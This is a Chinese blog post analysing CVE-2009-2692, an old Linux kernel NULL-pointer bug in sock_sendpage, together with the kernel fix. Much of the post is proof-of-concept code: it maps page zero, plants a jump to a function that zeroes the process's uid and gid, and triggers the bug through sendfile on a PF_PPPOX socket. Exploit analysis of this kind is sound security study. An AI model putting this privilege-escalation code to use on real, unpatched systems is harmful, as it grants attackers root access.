0地址的妙用(CVE-2009-2692)

最新推荐文章于 2023-11-09 15:48:45 发布
最新推荐文章于 2023-11-09 15:48:45 发布
阅读量3.3k 收藏 2
点赞数
分类专栏: Android安全 文章标签: CVE-2009-2692 0地址 NULL sendpage kernel_sendpage
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hu3167343/article/details/34831961
版权

/*

本文章由 莫灰灰 编写,转载请注明出处。  

作者:莫灰灰    邮箱: minzhenfei@163.com

*/

漏洞成因

其实0地址的妙用在windows上也有很多的利用,在windows的主动防御开发过程中,很多病毒都是用NULL地址来绕过主防的拦截。原理其实也很简单,因为开发主防的程序员经常会在自己的hook函数开头检查传进来的参数,例如if (param == NULL) return NTSTATUS_SUCCESS;这样的代码。
在Linux内核中,每个套接字都有一个名为proto_ops的相关操作结构,其中包含有用于实现各种功能(如接受、绑定、关闭等)的函数指针。如果对特定套接字的操作没有实现,就应将相关的函数指针指向预定义的存根。例如,如果没有定义accept功能,就应指向sock_no_accept()。但是,如果某些指针没有初始化,就可能出现其他情况。
再回过来说linux上的这个root漏洞,其实原理和windows上差不多,就是申请一块0地址的内存,然后往里面写入自己的函数代码,内核中没有判断是否为NULL就直接调用了,通常情况下,可能内核直接奔溃,但是我们申请了0地址空间之后,就会调用进我们的提取函数中了。


PoC分析

1.程序首先申请一份0地址空间

if ((personality(0xffffffff)) != PER_SVR4) {
<span style="white-space:pre">	</span>if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
		perror("mmap");
		return -1;
	}
} else {
	if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
		perror("mprotect");
		return -1;
	}
}


2.写入跳转代码,去执行我们的提权函数(这个 exploit貌似是x86架构上的) 

*(char *)0 = '\x90';
*(char *)1 = '\xe9';
*(unsigned long *)2 = (unsigned long)&kernel_code - 6;

3.提权函数采用了很巧妙的方法去修改uid和gid 

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
void kernel_code()
{
	int i;
	uint *p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {
 			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}

	exit_kernel();
}

4.0地址空间布局好之后,通过调用sendfile触发漏洞,提升权限 

if ((fdin = mkstemp(template)) < 0) {
	perror("mkstemp");
	return -1;
}
if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
	perror("socket");
	return -1;
}
unlink(template);
ftruncate(fdin, PAGE_SIZE);
sendfile(fdout, fdin, NULL, PAGE_SIZE);

漏洞修复


本来直接调用的sock->ops->sendpage函数被替换成了kernel_sendpage函数,而kernel_sendpage是会对sock->ops->sendpage指针最判空处理的。

int kernel_sendpage(struct socket *sock, struct page *page, int offset, size_t size, int flags)
{
	if (sock->ops->sendpage)
		return sock->ops->sendpage(sock, page, offset, size, flags);
	return sock_no_sendpage(sock, page, offset, size, flags);
}


莫灰灰
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅析CVE-2009-2692
少仲
04-23 1744
/* author:少仲 blog: http://blog.csdn.net/py_panyu weibo: http://weibo.com/u/3849478598 欢迎转载,转载请注明出处. */ 0x0 漏洞信息 http://cve.scap.org.cn/cve_detail.php?id=CVE-2009-2692 0x1 漏洞描述 Linux
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, ...CVE-2009-3555 CVE-2011-0793, CVE-2011-0804, CVE-2011-0806 (Windows only)
0地址
qq_44767162的博客
03-13 713
0地址解析 #define _CRT_SECURE_NO_WARNINGS #include&amp;amp;lt;stdio.h&amp;amp;gt; #include&amp;amp;lt;stdlib.h&amp;amp;gt; void swap(int *a, int *b) { int *tmp = NULL; *tmp = *a; *a = *b; *b = *tmp; } int main( void) { int a, b; a =...
何为0地址
yf_kisboy的博客
11-09 521
0地址
sendpage漏洞分析
05-21 643
之前看了《新爆内核高危漏洞sock_sendpage的利用分析的讨论》这篇帖子,在九贱兄和诸位CUer的指引下,大致弄清了整个漏洞的始末。现与大家分享(引用自我的空间)。有什么不足之处还望多多指教~内核的BUG这个BUG首先得从sendfile系统调用说起。考虑将一个本地文件通过socket发送出去的问题。我们通常的做
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
最新发布
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
对0地址的运用
huichaochao的博客
02-28 160
对0地址的运用
C语言 NULL与0 对应的地址
luoganttcc的博客
02-09 2080
#include <stdio.h> int main(int argc, char **argv) { int *p=0; int *q=NULL; printf("0 的地址是 %p \n",p); printf ("NULL地址是%p \n",p); return 0; } 0 的地址是 (nil) NULL地址是(nil)
linux 中0地址的使用技巧
sdc20102010的博客
05-26 1150
在C语言中指针时最精髓的东西,但是指针又是一个比较危险的东西 现在我们不讲指针我们制淡轮 指针的初始化。 指针的初始化离不开NULL 这个符号。 在c中NULL和0的值都是一样的,但是为了目的和用途及容易识别的原因,NULL用于指针和对象,0用于数值的初始化。 对于字符串的结尾,使用'\0',它的值也是0,但是让人一看就知道这是字符串的结尾,不是指针,也不是普通的数值 NULL...
linux 0地址妙用
m0_37313888的博客
09-02 797
1.楔子 我在学习list_head这个结构体的时候偶然发现了0地址这个东西,其中list_head是内嵌于许多数据结构的 比如用的最多的页 struct page { ...... struct list_head lru; ..... } 在伙伴系统中,可以利用page中lru的地址来找到page地址,其中就是使用的0地址的思想 2. "0地址"的使...
地址0上分配内存
weixin_34221036的博客
10-22 300
2019独角兽企业重金招聘Python工程师标准>>> ...
setuid,setgid的作用
RichardYSteven的专栏
07-27 1206
<br />先来看下面的code<br />#include <stdio.h><br /><br /> int main()<br /> {<br />     printf("pid:  %d/n", getpid());<br />     printf("ppid: %d/n", getppid());<br />     printf("uid:  %d/n", getuid());<br />     printf("euid: %d/n", geteuid(
int *p=NULL与*p=NULL
xmzzy2012的专栏
02-06 1827
int *p=NULL,式子说明 1、定义了一个指针变量p, 2、其所指向的内存里存放的是int型数据, 3、初始化p指向NULL(空内存)。 以上只是初始化了一个指针 *p=NULL,式子说明 1、将p指向的内存所存储的值设为NULL。 以上只是对p指向的内存所存储的变量赋值 例如: int i=10; //定义一整型变量 int *p=&i;//定义一个整型
程序从片内地址0开始,但为什么链接地址又设0x30000000,那不就从0x30000000开始了,反汇编可以看到不是从0开始的
lin111000713的专栏
08-15 2458
分类: 嵌入式硬件--裸机 2012-04-11 10:37 1592人阅读 评论(1) 收藏 举报 汇编存储flash 谢谢韦老大和独孤君 韦老大回答: 1. 裸板程序烧在FLASH上    一上电,肯定从0地址运行 2. 但是,0地址要么对应NOR FLASH,要么对应只有4K的片内内存 3. 程序要读写数据,或是程序大于4K,怎么办? 4. 程序就要复制到
cve-2009-1535漏洞补丁
06-01
cve-2009-1535漏洞是针对Adobe Flash Player的一个安全漏洞,攻击者可以利用该漏洞远程执行恶意代码,从而控制受感染的系统。Adobe已经发布了针对该漏洞的补丁,建议用户及时更新到最新版本的Adobe Flash Player。如果您需要手动安装补丁,请前往Adobe官方网站下载最新的安全补丁程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值